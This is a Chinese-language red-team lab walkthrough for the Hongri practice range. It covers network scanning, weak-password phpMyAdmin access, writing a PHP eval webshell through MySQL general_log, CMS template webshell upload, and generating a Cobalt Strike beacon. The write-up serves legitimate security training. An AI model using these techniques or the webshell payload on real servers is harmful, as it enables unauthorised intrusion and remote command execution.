0x01 关于红日靶场的下载和介绍
百度网盘: https://pan.baidu.com/s/1nC6V8e_EuKfaLb2IuEbe7w&shfl=sharepset
密码: 【红日安全】您的下载密码为:n1u2。
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实APT实战环境,从实战中成长。关于环境可以模拟出各种各样实战路线,目前给出作者实战的一套攻击实战路线如下,虚拟机所有统一密码:hongrisec@2019:
网络配置如图所示
打开虚拟网络编辑器
设置VMnet1子网IP
添加Vmnet2子网IP
网络拓扑图
实际配置的截图为
0x02 渗透服务器
信息收集
打开win7 x64的 phpstudy
发现主机
netdiscover -i eth0 -r 192.168.52.0/24
使用攻击机kali自带的 nmap 进行端口扫描
nmap -sS -A -n -T4 -p- 192.168.52.143
可知道已经开启勒 80 和其他端口
访问 80 端口
phpstudy的探针界面,我们使用 root/root 开始连接一下数据库
正上脚提示已经连接数据库成功
使用御剑开始进行扫描
得到 /phpmyadmin ,我们先放着我们的扫描得到的端口
使用 Dirmap 对于网站扫描以便得到网站的目录文件
dirmap.py -i http://192.168.52.143/ -lcf
下载源码文件 beifen.rar ,审查文件
使用VScode的搜索功能在PHP源文件(beifen\yxcms\data\db_back\1384692844.sql.php)找到密码
得到后台登陆的账号密码:admin:123456 和登录路径 /index.php?r=admin
0x03 开始 拿shell
登入 /phpmyadmin
弱密码 root/root
使用SQL语句查看是否有无权限
show variables like '%secure_file%';
secure_file_priv 值为 NULL 不能使用into 方法导入shell
我们尝试在日记写 shell ,使用SQL语句开启日志服务
set global general_log = "ON";
查看当前日志: show variables like 'general%';:
指定日志文件: set global general_log_file = "C:/phpStudy/www/1.php";:
开始写入一句话木马
SELECT '<?php eval($_POST["cmd"]);?>'
记录一下出错是怎么回事儿,自己运行的
phpstudy是在桌面上(Desktop)的 ,直接桌面上的导致路径出错,桌面上的打开的phpstudy的文件是在C:\WWWW
实际上输入一句话放在地方是C:\phpStudy\WWW
因为自己电脑装了两个phpstudy所以导致路径的问题,解决方法是:直接进入C:\phpStudy打开PHPSTUDY.EXE
这样我们就成功拿到 shell
0x04 另一种方式获取到SHELL
我们打开 192.168.52.143/yxcms
查看一下是否存在 目录遍历漏洞
我们使用之前得到的地址访问 /index.php?r=admin 进入后台
密码之前已经得到了:admin/123456
在前台模板的模块写入一句话木马
使用蚁剑连接到 shell
0x05 内网以及与域渗透
使用 CS 创建 Listen,payload 选择 beacon http
然后选择 攻击 -> 生成后门 -> Windows Executable(S) 选择刚创建的 Listenner
由于我们之前关闭勒防火墙,所以我们直接点击生成的 exe 文件就可以获得CS的shell
